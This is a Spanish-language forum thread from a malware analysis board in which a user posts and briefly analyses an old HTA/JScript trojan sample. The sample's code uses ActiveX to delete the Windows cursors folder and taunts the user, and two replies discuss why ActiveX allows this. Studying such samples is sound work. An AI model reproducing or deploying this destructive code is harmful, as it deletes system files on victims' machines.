elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Trojan.JS.Cursor
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Trojan.JS.Cursor  (Leído 3,524 veces)
patilanz


Desconectado Desconectado

Mensajes: 481

555-555-0199@example.com


Ver Perfil WWW
Trojan.JS.Cursor
« en: 24 Diciembre 2014, 10:33 am »

Hola me descargue un pack con muchos troyanos virus etc.. y ahora los estoy analizando.
Código
  1. [code=javascript]<HTML>
  2.  
  3. <TITLE>Virus</TITLE>
  4.  
  5. <script language="JScript">
  6.  
  7. var fs = new ActiveXObject("Scripting.FileSystemObject");
  8. var a = fs.DeleteFolder("c:\\windows/cursors");
  9.  
  10.  
  11. <HTA:APPLICATION
  12.       ID="oHTA"
  13.       APPLICATIONNAME="ComplexHTA"
  14.       CAPTION="yes"
  15.       ICON="ComplexHTA.ico"
  16.       MAXIMIZEBUTTON="no"
  17.       MINIMIZEBUTTON="no"
  18.       SHOWINTASKBAR="no"
  19.       SINGLEINSTANCE="no"
  20.       SYSMENU="no"
  21.       VERSION="1.0"
  22.       WINDOWSTATE="normal">
  23.  
  24. <script language="javascript">
  25.  
  26. var message="Now Hang On Here!";
  27.  
  28. function click(e) {
  29. if (document.all) {
  30. if (event.button == 2) {
  31. alert(message);
  32. return false;
  33. }
  34. }
  35. if (document.layers) {
  36. if (e.which == 3) {
  37. alert(message);
  38. return false;
  39. }
  40. }
  41. }
  42. if (document.layers) {
  43. document.captureEvents(Event.MOUSEDOWN);
  44. }
  45. document.onmousedown=click;
  46.  
  47.  
  48. </HEAD>
  49.  
  50. <BODY BGCOLOR="000000" TEXT="FFFFFF" LINK="6BC8F2" VLINK="6BC8F2" ALINK="6BC8F2">
  51.  
  52. <BR>
  53. <BR>
  54. <BR>
  55.  
  56. <CENTER>Congratulations!</CENTER>
  57.  
  58. <P>
  59.  
  60. <center><BUTTON onclick="self.close()">Click Here To Close
  61.  
  62.  
  63. </HTML>
  64.  
[/code]

Supongo que sera muy muy antiguo porque:

Código
  1. var fs = new ActiveXObject("Scripting.FileSystemObject");
  2. var a = fs.DeleteFolder("c:\\windows/cursors");

Borra la carpeta cursors así sin mas y luego se burla de que no puede pulsar el botón para salir  ;D
Que os parece?
En línea

BlackM4ster


Desconectado Desconectado

Mensajes: 499


Error, el teclado no funciona. Pulse F1 para continuar


Ver Perfil WWW
Re: Trojan.JS.Cursor
« Respuesta #1 en: 24 Diciembre 2014, 10:43 am »

No creo que javascript actualmente pueda borrar una carpeta del sistema xD
En línea

- Pásate por mi web -
https://codeisc.com
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Trojan.JS.Cursor
« Respuesta #2 en: 24 Diciembre 2014, 10:46 am »

No creo que javascript actualmente pueda borrar una carpeta del sistema xD

no es el jscript solo... es el activeX que lo hace vulnerable, permitiendo escapar del navegador
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cursor de la página
Sugerencias y dudas sobre el Foro
pipogorosito 6 2,916 Último mensaje 3 Enero 2005, 14:17 pm
por OxKuRiTo
Cursor XP
Diseño Gráfico
Free-Knowledgend 0 2,014 Último mensaje 20 Enero 2005, 19:54 pm
por Free-Knowledgend
Cursor
Programación Visual Basic
yeikos 6 2,625 Último mensaje 29 Agosto 2006, 03:45 am
por Red Mx
Cursor??? « 1 2 »
Programación Visual Basic
hepy_92 12 4,404 Último mensaje 27 Mayo 2007, 20:47 pm
por hepy_92
Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?
Análisis y Diseño de Malware
dega1980 3 3,236 Último mensaje 13 Abril 2014, 19:34 pm
por .:UND3R:.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines